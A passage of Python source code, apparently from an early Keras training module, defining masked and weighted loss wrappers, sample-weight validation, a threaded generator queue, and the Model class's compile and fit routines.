if fn is None:
return None
def weighted(y_true, y_pred, weights, mask=None):
"""Wrapper function.
# Arguments
y_true: `y_true` argument of `fn`.
y_pred: `y_pred` argument of `fn`.
weights: Weights tensor.
mask: Mask tensor.
# Returns
Scalar tensor.
"""
# score_array has ndim >= 2
score_array = fn(y_true, y_pred)
if mask is not None:
# Cast the mask to floatX to avoid float64 upcasting in theano
mask = K.cast(mask, K.floatx())
# mask should have the same shape as score_array
score_array *= mask
# the loss per batch should be proportional
# to the number of unmasked samples.
score_array /= K.mean(mask)
# reduce score_array to same ndim as weight array
ndim = K.ndim(score_array)
weight_ndim = K.ndim(weights)
score_array = K.mean(score_array, axis=list(range(weight_ndim, ndim)))
# apply sample weighting
if weights is not None:
score_array *= weights
score_array /= K.mean(K.cast(K.not_equal(weights, 0), K.floatx()))
return K.mean(score_array)
return weighted
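# Usage sketch (hypothetical tensors): `compile` below wires the wrapped function up with
# the target/output placeholders, roughly as:
#   weighted_mse = _weighted_masked_objective(losses.mean_squared_error)
#   output_loss = weighted_mse(y_true, y_pred, sample_weight_placeholder, mask)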
def _masked_objective(fn):
"""Adds support for masking to an objective function.
It transforms an objective function `fn(y_true, y_pred)`
into a cost-masked objective function
`fn(y_true, y_pred, mask)`.
# Arguments
fn: The objective function to wrap,
with signature `fn(y_true, y_pred)`.
# Returns
A function with signature `fn(y_true, y_pred, mask)`.
"""
def masked(y_true, y_pred, mask=None):
"""Wrapper function.
# Arguments
y_true: `y_true` argument of `fn`.
y_pred: `y_pred` argument of `fn`.
mask: Mask tensor.
# Returns
Scalar tensor.
"""
# score_array has ndim >= 2
score_array = fn(y_true, y_pred)
if mask is not None:
# Cast the mask to floatX to avoid float64 upcasting in theano
mask = K.cast(mask, K.floatx())
# mask should have the same shape as score_array
score_array *= mask
# the loss per batch should be proportional
# to the number of unmasked samples.
score_array /= K.mean(mask)
return K.mean(score_array)
return masked
def _standardize_weights(y, sample_weight=None, class_weight=None,
sample_weight_mode=None):
"""Performs sample weight validation and standardization.
Everything gets normalized to a single sample-wise (or timestep-wise)
weight array.
# Arguments
y: Numpy array of model targets to be weighted.
sample_weight: User-provided `sample_weight` argument.
class_weight: User-provided `class_weight` argument.
sample_weight_mode: One of `None` or `"temporal"`.
`"temporal"` indicated that we expect 2D weight data
that will be applied to the last 2 dimensions of
the targets (i.e. we are weighting timesteps, not samples).
# Returns
A numpy array of target weights, one entry per sample to weight.
# Raises
ValueError: In case of invalid user-provided arguments.
"""
if sample_weight_mode is not None:
if sample_weight_mode != 'temporal':
raise ValueError('"sample_weight_mode '
'should be None or "temporal". '
'Found: ' + str(sample_weight_mode))
if len(y.shape) < 3:
raise ValueError('Found a sample_weight array for '
'an input with shape ' +
str(y.shape) + '. '
'Timestep-wise sample weighting (use of '
'sample_weight_mode="temporal") is restricted to '
'outputs that are at least 3D, i.e. that have '
'a time dimension.')
if sample_weight is not None and len(sample_weight.shape) != 2:
raise ValueError('Found a sample_weight array with shape ' +
str(sample_weight.shape) + '. '
'In order to use timestep-wise sample weighting, '
'you should pass a 2D sample_weight array.')
else:
if sample_weight is not None and len(sample_weight.shape) != 1:
raise ValueError('Found a sample_weight array with shape ' +
str(sample_weight.shape) + '. '
'In order to use timestep-wise sample weights, '
'you should specify '
'sample_weight_mode="temporal" '
'in compile(). If you just mean to use '
'sample-wise weights, make sure your '
'sample_weight array is 1D.')
if sample_weight is not None:
if len(sample_weight.shape) > len(y.shape):
            raise ValueError('Found a sample_weight with shape ' +
                             str(sample_weight.shape) + '. '
'Expected sample_weight with rank '
'less than or equal to ' + str(len(y.shape)))
if y.shape[:sample_weight.ndim] != sample_weight.shape:
raise ValueError('Found a sample_weight array with shape ' +
str(sample_weight.shape) + ' for an input with shape ' +
str(y.shape) + '. '
'sample_weight cannot be broadcast.')
return sample_weight
elif isinstance(class_weight, dict):
if len(y.shape) > 2:
raise ValueError('class_weight not supported for '
'3+ dimensional targets.')
if y.shape[1] > 1:
y_classes = y.argmax(axis=1)
elif y.shape[1] == 1:
y_classes = np.reshape(y, y.shape[0])
else:
y_classes = y
weights = np.asarray([class_weight[cls] for cls in y_classes])
return weights
else:
if sample_weight_mode is None:
return np.ones((y.shape[0],), dtype=K.floatx())
else:
return np.ones((y.shape[0], y.shape[1]), dtype=K.floatx())
class GeneratorEnqueuer(object):
"""Builds a queue out of a data generator.
Used in `fit_generator`, `evaluate_generator`, `predict_generator`.
# Arguments
generator: a generator function which endlessly yields data
pickle_safe: use multiprocessing if True, otherwise threading
"""
def __init__(self, generator, pickle_safe=False):
self._generator = generator
self._pickle_safe = pickle_safe
self._threads = []
self._stop_event = None
self.queue = None
def start(self, workers=1, max_q_size=10, wait_time=0.05):
"""Kicks off threads which add data from the generator into the queue.
# Arguments
workers: number of worker threads
max_q_size: queue size (when full, threads could block on put())
wait_time: time to sleep in-between calls to put()
"""
def data_generator_task():
while not self._stop_event.is_set():
try:
if self._pickle_safe or self.queue.qsize() < max_q_size:
generator_output = next(self._generator)
self.queue.put(generator_output)
else:
time.sleep(wait_time)
except Exception:
self._stop_event.set()
raise
try:
if self._pickle_safe:
self.queue = multiprocessing.Queue(maxsize=max_q_size)
self._stop_event = multiprocessing.Event()
else:
self.queue = queue.Queue()
self._stop_event = threading.Event()
for _ in range(workers):
if self._pickle_safe:
                    # Reset the random seed, otherwise all child
                    # processes would share the same seed
np.random.seed()
thread = multiprocessing.Process(target=data_generator_task)
thread.daemon = True
else:
thread = threading.Thread(target=data_generator_task)
self._threads.append(thread)
thread.start()
except:
self.stop()
raise
def is_running(self):
return self._stop_event is not None and not self._stop_event.is_set()
def stop(self, timeout=None):
"""Stop running threads and wait for them to exit, if necessary.
Should be called by the same thread which called start().
# Arguments
timeout: maximum time to wait on thread.join()
"""
if self.is_running():
self._stop_event.set()
for thread in self._threads:
if thread.is_alive():
if self._pickle_safe:
thread.terminate()
else:
thread.join(timeout)
if self._pickle_safe:
if self.queue is not None:
self.queue.close()
self._threads = []
self._stop_event = None
self.queue = None
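# Usage sketch (hypothetical generator `batch_gen` yielding (x, y) tuples), mirroring how
# fit_generator drives this class:
#   enqueuer = GeneratorEnqueuer(batch_gen, pickle_safe=False)
#   enqueuer.start(workers=2, max_q_size=10)
#   while enqueuer.is_running():
#       if not enqueuer.queue.empty():
#           x, y = enqueuer.queue.get()
#           break
#       time.sleep(0.01)
#   enqueuer.stop()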
class Model(Container):
"""The `Model` class adds training & evaluation routines to a `Container`.
"""
def compile(self, optimizer, loss, metrics=None, loss_weights=None,
sample_weight_mode=None, **kwargs):
"""Configures the model for training.
# Arguments
optimizer: str (name of optimizer) or optimizer object.
See [optimizers](/optimizers).
loss: str (name of objective function) or objective function.
See [losses](/losses).
If the model has multiple outputs, you can use a different loss
on each output by passing a dictionary or a list of losses.
The loss value that will be minimized by the model
will then be the sum of all individual losses.
metrics: list of metrics to be evaluated by the model
during training and testing.
Typically you will use `metrics=['accuracy']`.
To specify different metrics for different outputs of a
multi-output model, you could also pass a dictionary,
such as `metrics={'output_a': 'accuracy'}`.
loss_weights: Optional list or dictionary specifying scalar
coefficients (Python floats) to weight the loss contributions
of different model outputs.
The loss value that will be minimized by the model
will then be the *weighted sum* of all individual losses,
weighted by the `loss_weights` coefficients.
If a list, it is expected to have a 1:1 mapping
                to the model's outputs. If a dict, it is expected to map
output names (strings) to scalar coefficients.
sample_weight_mode: if you need to do timestep-wise
sample weighting (2D weights), set this to `"temporal"`.
`None` defaults to sample-wise weights (1D).
If the model has multiple outputs, you can use a different
`sample_weight_mode` on each output by passing a
dictionary or a list of modes.
**kwargs: when using the Theano backend, these arguments
are passed into K.function. Ignored for Tensorflow backend.
# Raises
ValueError: In case of invalid arguments for
`optimizer`, `loss`, `metrics` or `sample_weight_mode`.
"""
loss = loss or {}
self.optimizer = optimizers.get(optimizer)
self.sample_weight_mode = sample_weight_mode
self.loss = loss
self.loss_weights = loss_weights
# Prepare loss functions.
if isinstance(loss, dict):
for name in loss:
if name not in self.output_names:
raise ValueError('Unknown entry in loss '
'dictionary: "' + name + '". '
'Only expected the following keys: ' +
str(self.output_names))
loss_functions = []
for name in self.output_names:
if name not in loss:
warnings.warn('Output "' + name +
'" missing from loss dictionary. '
'We assume this was done on purpose, '
'and we will not be expecting '
'any data to be passed to "' + name +
'" during training.', stacklevel=2)
loss_functions.append(losses.get(loss.get(name)))
elif isinstance(loss, list):
if len(loss) != len(self.outputs):
raise ValueError('When passing a list as loss, '
                                 'it should have one entry per model output. '
'The model has ' + str(len(self.outputs)) +
' outputs, but you passed loss=' +
str(loss))
loss_functions = [losses.get(l) for l in loss]
else:
loss_function = losses.get(loss)
loss_functions = [loss_function for _ in range(len(self.outputs))]
self.loss_functions = loss_functions
weighted_losses = [_weighted_masked_objective(fn) for fn in loss_functions]
skip_indices = []
self._feed_outputs = []
self._feed_output_names = []
self._feed_output_shapes = []
self._feed_loss_fns = []
for i in range(len(weighted_losses)):
if weighted_losses[i] is None:
skip_indices.append(i)
else:
self._feed_outputs.append(self.outputs[i])
self._feed_output_names.append(self.output_names[i])
self._feed_output_shapes.append(self.internal_output_shapes[i])
self._feed_loss_fns.append(self.loss_functions[i])
# Prepare output masks.
masks = self.compute_mask(self.inputs, mask=None)
if masks is None:
masks = [None for _ in self.outputs]
if not isinstance(masks, list):
masks = [masks]
# Prepare loss weights.
if loss_weights is None:
loss_weights_list = [1. for _ in range(len(self.outputs))]
elif isinstance(loss_weights, dict):
for name in loss_weights:
if name not in self.output_names:
raise ValueError('Unknown entry in loss_weights '
'dictionary: "' + name + '". '
'Only expected the following keys: ' +
str(self.output_names))
loss_weights_list = []
for name in self.output_names:
loss_weights_list.append(loss_weights.get(name, 1.))
elif isinstance(loss_weights, list):
if len(loss_weights) != len(self.outputs):
raise ValueError('When passing a list as loss_weights, '
                                 'it should have one entry per model output. '
'The model has ' + str(len(self.outputs)) +
' outputs, but you passed loss_weights=' +
str(loss_weights))
loss_weights_list = loss_weights
else:
raise TypeError('Could not interpret loss_weights argument: ' +
str(loss_weights) +
                            ' - expected a list or a dict.')
# Prepare sample weights.
sample_weights = []
sample_weight_modes = []
if isinstance(sample_weight_mode, dict):
for name in sample_weight_mode:
if name not in self.output_names:
raise ValueError('Unknown entry in '
'sample_weight_mode dictionary: "' +
name + '". '
'Only expected the following keys: ' +
str(self.output_names))
for i, name in enumerate(self.output_names):
if i in skip_indices:
weight = None
sample_weight_modes.append(None)
else:
if name not in sample_weight_mode:
raise ValueError('Output "' + name +
'" missing from sample_weight_modes '
'dictionary')
if sample_weight_mode.get(name) == 'temporal':
weight = K.placeholder(ndim=2,
name=name + '_sample_weights')
sample_weight_modes.append('temporal')
else:
weight = K.placeholder(ndim=1,
name=name + '_sample_weights')
sample_weight_modes.append(None)
sample_weights.append(weight)
elif isinstance(sample_weight_mode, list):
if len(sample_weight_mode) != len(self.outputs):
raise ValueError('When passing a list as sample_weight_mode, '
                                 'it should have one entry per model output. '
'The model has ' + str(len(self.outputs)) +
' outputs, but you passed '
'sample_weight_mode=' +
str(sample_weight_mode))
for i in range(len(self.output_names)):
if i in skip_indices:
weight = None
sample_weight_modes.append(None)
else:
mode = sample_weight_mode[i]
name = self.output_names[i]
if mode == 'temporal':
weight = K.placeholder(ndim=2,
name=name + '_sample_weights')
sample_weight_modes.append('temporal')
else:
weight = K.placeholder(ndim=1,
name=name + '_sample_weights')
sample_weight_modes.append(None)
sample_weights.append(weight)
else:
for i, name in enumerate(self.output_names):
if i in skip_indices:
sample_weight_modes.append(None)
sample_weights.append(None)
else:
if sample_weight_mode == 'temporal':
sample_weights.append(
K.placeholder(ndim=2,
name=name + '_sample_weights'))
sample_weight_modes.append('temporal')
else:
sample_weights.append(
K.placeholder(ndim=1,
name=name + '_sample_weights'))
sample_weight_modes.append(None)
self.sample_weight_modes = sample_weight_modes
self._feed_sample_weight_modes = []
for i in range(len(self.outputs)):
if i not in skip_indices:
self._feed_sample_weight_modes.append(self.sample_weight_modes[i])
# Prepare targets of model.
self.targets = []
self._feed_targets = []
for i in range(len(self.outputs)):
if i in skip_indices:
self.targets.append(None)
else:
shape = self.internal_output_shapes[i]
name = self.output_names[i]
target = K.placeholder(ndim=len(shape),
name=name + '_target',
sparse=K.is_sparse(self.outputs[i]),
dtype=K.dtype(self.outputs[i]))
self.targets.append(target)
self._feed_targets.append(target)
# Prepare metrics.
self.metrics = metrics
self.metrics_names = ['loss']
self.metrics_tensors = []
# Compute total loss.
total_loss = None
for i in range(len(self.outputs)):
if i in skip_indices:
continue
y_true = self.targets[i]
y_pred = self.outputs[i]
weighted_loss = weighted_losses[i]
sample_weight = sample_weights[i]
mask = masks[i]
loss_weight = loss_weights_list[i]
output_loss = weighted_loss(y_true, y_pred,
sample_weight, mask)
if len(self.outputs) > 1:
self.metrics_tensors.append(output_loss)
self.metrics_names.append(self.output_names[i] + '_loss')
if total_loss is None:
total_loss = loss_weight * output_loss
else:
total_loss += loss_weight * output_loss
if total_loss is None:
if not self.losses:
raise RuntimeError('The model cannot be compiled '
'because it has no loss to optimize.')
else:
total_loss = 0.
# Add regularization penalties
# and other layer-specific losses.
for loss_tensor in self.losses:
total_loss += loss_tensor
        # List of the same size as output_names,
        # containing tuples (metrics for output, names of metrics).
nested_metrics = _collect_metrics(metrics, self.output_names)
def append_metric(layer_num, metric_name, metric_tensor):
"""Helper function used in loop below."""
if len(self.output_names) > 1:
metric_name = self.output_layers[layer_num].name + '_' + metric_name
self.metrics_names.append(metric_name)
self.metrics_tensors.append(metric_tensor)
for i in range(len(self.outputs)):
if i in skip_indices:
continue
y_true = self.targets[i]
y_pred = self.outputs[i]
output_metrics = nested_metrics[i]
for metric in output_metrics:
if metric == 'accuracy' or metric == 'acc':
# custom handling of accuracy
# (because of class mode duality)
output_shape = self.internal_output_shapes[i]
acc_fn = None
if (output_shape[-1] == 1 or
self.loss_functions[i] == losses.binary_crossentropy):
# case: binary accuracy
acc_fn = metrics_module.binary_accuracy
elif self.loss_functions[i] == losses.sparse_categorical_crossentropy:
# case: categorical accuracy with sparse targets
acc_fn = metrics_module.sparse_categorical_accuracy
else:
acc_fn = metrics_module.categorical_accuracy
masked_fn = _masked_objective(acc_fn)
append_metric(i, 'acc', masked_fn(y_true, y_pred, mask=masks[i]))
else:
metric_fn = metrics_module.get(metric)
masked_metric_fn = _masked_objective(metric_fn)
metric_result = masked_metric_fn(y_true, y_pred, mask=masks[i])
metric_result = {
metric_fn.__name__: metric_result
}
for name, tensor in six.iteritems(metric_result):
append_metric(i, name, tensor)
# Prepare gradient updates and state updates.
self.total_loss = total_loss
self.sample_weights = sample_weights
self._feed_sample_weights = []
for i in range(len(self.sample_weights)):
if i not in skip_indices:
self._feed_sample_weights.append(sample_weights[i])
# Functions for train, test and predict will
# be compiled lazily when required.
# This saves time when the user is not using all functions.
self._function_kwargs = kwargs
self.train_function = None
self.test_function = None
self.predict_function = None
        # Collect trainable weights and sort them deterministically.
trainable_weights = self.trainable_weights
# Sort weights by name.
if trainable_weights:
if K.backend() == 'theano':
trainable_weights.sort(key=lambda x: x.name if x.name else x.auto_name)
else:
trainable_weights.sort(key=lambda x: x.name)
self._collected_trainable_weights = trainable_weights
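    # Illustrative sketch (not part of the library; model and output names are hypothetical):
    # how the loss / loss_weights / sample_weight_mode preparation above maps to a typical
    # multi-output `compile` call, with per-output settings matched by output name.
    #
    # >>> model.compile(optimizer='rmsprop',
    # ...               loss={'age': 'mse', 'gender': 'binary_crossentropy'},
    # ...               loss_weights={'age': 0.5, 'gender': 1.0},
    # ...               sample_weight_mode={'age': 'temporal', 'gender': None},
    # ...               metrics={'gender': ['accuracy']})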
def _make_train_function(self):
if not hasattr(self, 'train_function'):
raise RuntimeError('You must compile your model before using it.')
if self.train_function is None:
inputs = self._feed_inputs + self._feed_targets + self._feed_sample_weights
if self.uses_learning_phase and not isinstance(K.learning_phase(), int):
inputs += [K.learning_phase()]
training_updates = self.optimizer.get_updates(
self._collected_trainable_weights,
self.constraints,
self.total_loss)
updates = self.updates + training_updates
# Gets loss and metrics. Updates weights at each call.
self.train_function = K.function(inputs,
[self.total_loss] + self.metrics_tensors,
updates=updates,
name='train_function',
**self._function_kwargs)
def _make_test_function(self):
if not hasattr(self, 'test_function'):
raise RuntimeError('You must compile your model before using it.')
if self.test_function is None:
inputs = self._feed_inputs + self._feed_targets + self._feed_sample_weights
if self.uses_learning_phase and not isinstance(K.learning_phase(), int):
inputs += [K.learning_phase()]
# Return loss and metrics, no gradient updates.
# Does update the network states.
self.test_function = K.function(inputs,
[self.total_loss] + self.metrics_tensors,
updates=self.state_updates,
name='test_function',
**self._function_kwargs)
def _make_predict_function(self):
if not hasattr(self, 'predict_function'):
self.predict_function = None
if self.predict_function is None:
if self.uses_learning_phase and not isinstance(K.learning_phase(), int):
inputs = self._feed_inputs + [K.learning_phase()]
else:
inputs = self._feed_inputs
# Gets network outputs. Does not update weights.
# Does update the network states.
kwargs = getattr(self, '_function_kwargs', {})
self.predict_function = K.function(inputs,
self.outputs,
updates=self.state_updates,
name='predict_function',
**kwargs)
def _fit_loop(self, f, ins, out_labels=None, batch_size=32,
epochs=100, verbose=1, callbacks=None,
val_f=None, val_ins=None, shuffle=True,
callback_metrics=None, initial_epoch=0):
"""Abstract fit function for `f(ins)`.
Assume that f returns a list, labeled by out_labels.
# Arguments
f: Keras function returning a list of tensors
ins: list of tensors to be fed to `f`
out_labels: list of strings, display names of
the outputs of `f`
batch_size: integer batch size
epochs: number of times to iterate over the data
verbose: verbosity mode, 0, 1 or 2
callbacks: list of callbacks to be called during training
val_f: Keras function to call for validation
val_ins: list of tensors to be fed to `val_f`
shuffle: whether to shuffle the data at the beginning of each epoch
callback_metrics: list of strings, the display names of the metrics
                passed to the callbacks. They should be the
                concatenation of the list of display names of the outputs of
                `f` and the list of display names of the outputs of `f_val`.
initial_epoch: epoch at which to start training
(useful for resuming a previous training run)
# Returns
`History` object.
"""
do_validation = False
if val_f and val_ins:
do_validation = True
if verbose:
print('Train on %d samples, validate on %d samples' %
(ins[0].shape[0], val_ins[0].shape[0]))
if ins and hasattr(ins[0], 'shape'):
num_train_samples = ins[0].shape[0]
else:
# May happen if we are running `fit` without Numpy input data,
# i.e. if all inputs to the models are data tensors
# instead of placeholders.
# In that case we will run `fit` over a single batch.
num_train_samples = batch_size
verbose = 2
index_array = np.arange(num_train_samples)
self.history = cbks.History()
callbacks = [cbks.BaseLogger()] + (callbacks or []) + [self.history]
if verbose:
callbacks += [cbks.ProgbarLogger()]
callbacks = cbks.CallbackList(callbacks)
out_labels = out_labels or []
# it's possible to callback a different model than self
# (used by Sequential models)
if hasattr(self, 'callback_model') and self.callback_model:
callback_model = self.callback_model
else:
callback_model = self
callbacks.set_model(callback_model)
callbacks.set_params({
'batch_size': batch_size,
'epochs': epochs,
'samples': num_train_samples,
'verbose': verbose,
'do_validation': do_validation,
'metrics': callback_metrics or [],
})
callbacks.on_train_begin()
callback_model.stop_training = False
for cbk in callbacks:
cbk.validation_data = val_ins
for epoch in range(initial_epoch, epochs):
callbacks.on_epoch_begin(epoch)
if shuffle == 'batch':
index_array = _batch_shuffle(index_array, batch_size)
elif shuffle:
np.random.shuffle(index_array)
batches = _make_batches(num_train_samples, batch_size)
epoch_logs = {}
for batch_index, (batch_start, batch_end) in enumerate(batches):
batch_ids = index_array[batch_start:batch_end]
try:
if isinstance(ins[-1], float):
# Do not slice the training phase flag.
ins_batch = _slice_arrays(ins[:-1], batch_ids) + [ins[-1]]
else:
ins_batch = _slice_arrays(ins, batch_ids)
except TypeError:
raise TypeError('TypeError while preparing batch. '
'If using HDF5 input data, '
'pass shuffle="batch".')
batch_logs = {}
batch_logs['batch'] = batch_index
batch_logs['size'] = len(batch_ids)
callbacks.on_batch_begin(batch_index, batch_logs)
outs = f(ins_batch)
if not isinstance(outs, list):
outs = [outs]
for l, o in zip(out_labels, outs):
batch_logs[l] = o
callbacks.on_batch_end(batch_index, batch_logs)
if callback_model.stop_training:
break
if batch_index == len(batches) - 1: # Last batch.
if do_validation:
val_outs = self._test_loop(val_f, val_ins,
batch_size=batch_size,
verbose=0)
if not isinstance(val_outs, list):
val_outs = [val_outs]
# Same labels assumed.
for l, o in zip(out_labels, val_outs):
epoch_logs['val_' + l] = o
callbacks.on_epoch_end(epoch, epoch_logs)
if callback_model.stop_training:
break
callbacks.on_train_end()
return self.history
def _predict_loop(self, f, ins, batch_size=32, verbose=0):
"""Abstract method to loop over some data in batches.
# Arguments
f: Keras function returning a list of tensors.
ins: list of tensors to be fed to `f`.
batch_size: integer batch size.
verbose: verbosity mode.
# Returns
Array of predictions (if the model has a single output)
or list of arrays of predictions
(if the model has multiple outputs).
"""
if ins and hasattr(ins[0], 'shape'):
samples = ins[0].shape[0]
else:
# May happen if we are running `predict` without Numpy input data,
# i.e. if all inputs to the models are data tensors
# instead of placeholders.
# In that case we will run `predict` over a single batch.
samples = batch_size
verbose = 2
outs = []
if verbose == 1:
progbar = Progbar(target=samples)
batches = _make_batches(samples, batch_size)
index_array = np.arange(samples)
for batch_index, (batch_start, batch_end) in enumerate(batches):
batch_ids = index_array[batch_start:batch_end]
if ins and isinstance(ins[-1], float):
# Do not slice the training phase flag.
ins_batch = _slice_arrays(ins[:-1], batch_ids) + [ins[-1]]
else:
ins_batch = _slice_arrays(ins, batch_ids)
batch_outs = f(ins_batch)
if not isinstance(batch_outs, list):
batch_outs = [batch_outs]
if batch_index == 0:
for batch_out in batch_outs:
shape = (samples,) + batch_out.shape[1:]
outs.append(np.zeros(shape, dtype=batch_out.dtype))
for i, batch_out in enumerate(batch_outs):
outs[i][batch_start:batch_end] = batch_out
if verbose == 1:
progbar.update(batch_end)
if len(outs) == 1:
return outs[0]
return outs
def _test_loop(self, f, ins, batch_size=32, verbose=0):
"""Abstract method to loop over some data in batches.
# Arguments
f: Keras function returning a list of tensors.
ins: list of tensors to be fed to `f`.
batch_size: integer batch size.
verbose: verbosity mode.
# Returns
Scalar loss (if the model has a single output and no metrics)
or list of scalars (if the model has multiple outputs
and/or metrics). The attribute `model.metrics_names` will give you
the display labels for the scalar outputs.
"""
if ins and hasattr(ins[0], 'shape'):
samples = ins[0].shape[0]
else:
# May happen if we are running `evaluate` without Numpy input data,
# i.e. if all inputs to the models are data tensors
# instead of placeholders.
# In that case we will run `evaluate` over a single batch.
samples = batch_size
verbose = 2
outs = []
if verbose == 1:
progbar = Progbar(target=samples)
batches = _make_batches(samples, batch_size)
index_array = np.arange(samples)
for batch_index, (batch_start, batch_end) in enumerate(batches):
batch_ids = index_array[batch_start:batch_end]
if isinstance(ins[-1], float):
# Do not slice the training phase flag.
ins_batch = _slice_arrays(ins[:-1], batch_ids) + [ins[-1]]
else:
ins_batch = _slice_arrays(ins, batch_ids)
batch_outs = f(ins_batch)
if isinstance(batch_outs, list):
if batch_index == 0:
                    for _ in batch_outs:
outs.append(0.)
for i, batch_out in enumerate(batch_outs):
outs[i] += batch_out * len(batch_ids)
else:
if batch_index == 0:
outs.append(0.)
outs[0] += batch_outs * len(batch_ids)
if verbose == 1:
progbar.update(batch_end)
for i in range(len(outs)):
outs[i] /= samples
if len(outs) == 1:
return outs[0]
return outs
def _standardize_user_data(self, x, y,
sample_weight=None, class_weight=None,
check_batch_axis=True, batch_size=None):
if not hasattr(self, 'optimizer'):
raise RuntimeError('You must compile a model before '
'training/testing. '
'Use `model.compile(optimizer, loss)`.')
output_shapes = []
for output_shape, loss_fn in zip(self._feed_output_shapes, self._feed_loss_fns):
if loss_fn.__name__ == 'sparse_categorical_crossentropy':
output_shapes.append(output_shape[:-1] + (1,))
elif getattr(losses, loss_fn.__name__, None) is None:
output_shapes.append(None)
else:
output_shapes.append(output_shape)
x = _standardize_input_data(x, self._feed_input_names,
self._feed_input_shapes,
check_batch_axis=False,
exception_prefix='input')
y = _standardize_input_data(y, self._feed_output_names,
output_shapes,
check_batch_axis=False,
exception_prefix='target')
sample_weights = _standardize_sample_weights(sample_weight,
self._feed_output_names)
class_weights = _standardize_class_weights(class_weight,
self._feed_output_names)
sample_weights = [_standardize_weights(ref, sw, cw, mode)
for (ref, sw, cw, mode)
in zip(y, sample_weights, class_weights, self._feed_sample_weight_modes)]
_check_array_lengths(x, y, sample_weights)
_check_loss_and_target_compatibility(y,
self._feed_loss_fns,
self._feed_output_shapes)
if self.stateful and batch_size:
if x[0].shape[0] % batch_size != 0:
raise ValueError('In a stateful network, '
'you should only pass inputs with '
'a number of samples that can be '
'divided by the batch size. Found: ' +
str(x[0].shape[0]) + ' samples')
return x, y, sample_weights
def _get_deduped_metrics_names(self):
out_labels = self.metrics_names
# Rename duplicated metrics name
# (can happen with an output layer shared among multiple dataflows).
deduped_out_labels = []
for i, label in enumerate(out_labels):
new_label = label
if out_labels.count(label) > 1:
dup_idx = out_labels[:i].count(label)
new_label += '_' + str(dup_idx + 1)
deduped_out_labels.append(new_label)
return deduped_out_labels
def fit(self, x=None,
y=None,
batch_size=32,
epochs=1,
verbose=1,
callbacks=None,
validation_split=0.,
validation_data=None,
shuffle=True,
class_weight=None,
sample_weight=None,
initial_epoch=0,
**kwargs):
"""Trains the model for a fixed number of epochs (iterations on a dataset).
# Arguments
x: Numpy array of training data,
or list of Numpy arrays if the model has multiple inputs.
If all inputs in the model are named,
you can also pass a dictionary
mapping input names to Numpy arrays.
y: Numpy array of target data,
or list of Numpy arrays if the model has multiple outputs.
If all outputs in the model are named,
you can also pass a dictionary
mapping output names to Numpy arrays.
batch_size: integer. Number of samples per gradient update.
epochs: integer, the number of times to iterate
over the training data arrays.
verbose: 0, 1, or 2. Verbosity mode.
0 = silent, 1 = verbose, 2 = one log line per epoch.
callbacks: list of callbacks to be called during training.
See [callbacks](/callbacks).
validation_split: float between 0 and 1:
fraction of the training data to be used as validation data.
The model will set apart this fraction of the training data,
will not train on it, and will evaluate
the loss and any model metrics
on this data at the end of each epoch.
validation_data: data on which to evaluate
the loss and any model metrics
at the end of each epoch. The model will not
be trained on this data.
This could be a tuple (x_val, y_val)
or a tuple (x_val, y_val, val_sample_weights).
shuffle: boolean, whether to shuffle the training data
before each epoch.
class_weight: optional dictionary mapping
class indices (integers) to
a weight (float) to apply to the model's loss for the samples
from this class during training.
This can be useful to tell the model to "pay more attention" to
samples from an under-represented class.
sample_weight: optional array of the same length as x, containing
weights to apply to the model's loss for each sample.
In the case of temporal data, you can pass a 2D array
with shape (samples, sequence_length),
to apply a different weight to every timestep of every sample.
In this case you should make sure to specify
sample_weight_mode="temporal" in compile().
initial_epoch: epoch at which to start training
(useful for resuming a previous training run)
# Returns
A `History` instance. Its `history` attribute contains
all information collected during training.
# Raises
ValueError: In case of mismatch between the provided input data
and what the model expects.
"""
# Legacy support
if 'nb_epoch' in kwargs:
warnings.warn('The `nb_epoch` argument in `fit` '
'has been renamed `epochs`.', stacklevel=2)
epochs = kwargs.pop('nb_epoch')
if kwargs:
raise TypeError('Unrecognized keyword arguments: ' + str(kwargs))
# Validate user data.
x, y, sample_weights = self._standardize_user_data(
x, y,
sample_weight=sample_weight,
class_weight=class_weight,
check_batch_axis=False,
batch_size=batch_size)
# Prepare validation data.
if validation_data:
do_validation = True
if len(validation_data) == 2:
val_x, val_y = validation_data
val_sample_weight = None
elif len(validation_data) == 3:
val_x, val_y, val_sample_weight = validation_data
else:
raise ValueError('When passing validation_data, '
'it must contain 2 (x_val, y_val) '
'or 3 (x_val, y_val, val_sample_weights) '
'items, however it contains %d items' %
len(validation_data))
val_x, val_y, val_sample_weights = self._standardize_user_data(
val_x, val_y,
sample_weight=val_sample_weight,
check_batch_axis=False,
batch_size=batch_size)
self._make_test_function()
val_f = self.test_function
if self.uses_learning_phase and not isinstance(K.learning_phase(), int):
val_ins = val_x + val_y + val_sample_weights + [0.]
else:
val_ins = val_x + val_y + val_sample_weights
elif validation_split and 0. < validation_split < 1.:
do_validation = True
split_at = int(len(x[0]) * (1. - validation_split))
x, val_x = (_slice_arrays(x, 0, split_at), _slice_arrays(x, split_at))
y, val_y = (_slice_arrays(y, 0, split_at), _slice_arrays(y, split_at))
sample_weights, val_sample_weights = (
_slice_arrays(sample_weights, 0, split_at),
_slice_arrays(sample_weights, split_at))
self._make_test_function()
val_f = self.test_function
if self.uses_learning_phase and not isinstance(K.learning_phase(), int):
val_ins = val_x + val_y + val_sample_weights + [0.]
else:
val_ins = val_x + val_y + val_sample_weights
else:
do_validation = False
val_f = None
val_ins = None
# Prepare input arrays and training function.
if self.uses_learning_phase and not isinstance(K.learning_phase(), int):
ins = x + y + sample_weights + [1.]
else:
ins = x + y + sample_weights
self._make_train_function()
f = self.train_function
# Prepare display labels.
out_labels = self._get_deduped_metrics_names()
if do_validation:
callback_metrics = copy.copy(out_labels) + ['val_' + n for n in out_labels]
else:
callback_metrics = copy.copy(out_labels)
# Delegate logic to `_fit_loop`.
return self._fit_loop(f, ins, out_labels=out_labels,
batch_size=batch_size, epochs=epochs,
verbose=verbose, callbacks=callbacks,
val_f=val_f, val_ins=val_ins, shuffle=shuffle,
callback_metrics=callback_metrics,
initial_epoch=initial_epoch)
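    # Illustrative sketch (hypothetical arrays and model): a typical call into `fit`,
    # combining validation_split and class_weight as described in the docstring above.
    #
    # >>> history = model.fit(x_train, y_train,
    # ...                     batch_size=64,
    # ...                     epochs=10,
    # ...                     validation_split=0.2,
    # ...                     class_weight={0: 1., 1: 5.},
    # ...                     verbose=1)
    # >>> history.history['val_loss']  # per-epoch validation loss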
def evaluate(self, x, y, batch_size=32, verbose=1, sample_weight=None):
"""Returns the loss value & metrics values for the model in test mode.
Computation is done in batches.
# Arguments
x: Numpy array of test data,
or list of Numpy arrays if the model has multiple inputs.
If all inputs in the model are named,
you can also pass a dictionary
mapping input names to Numpy arrays.
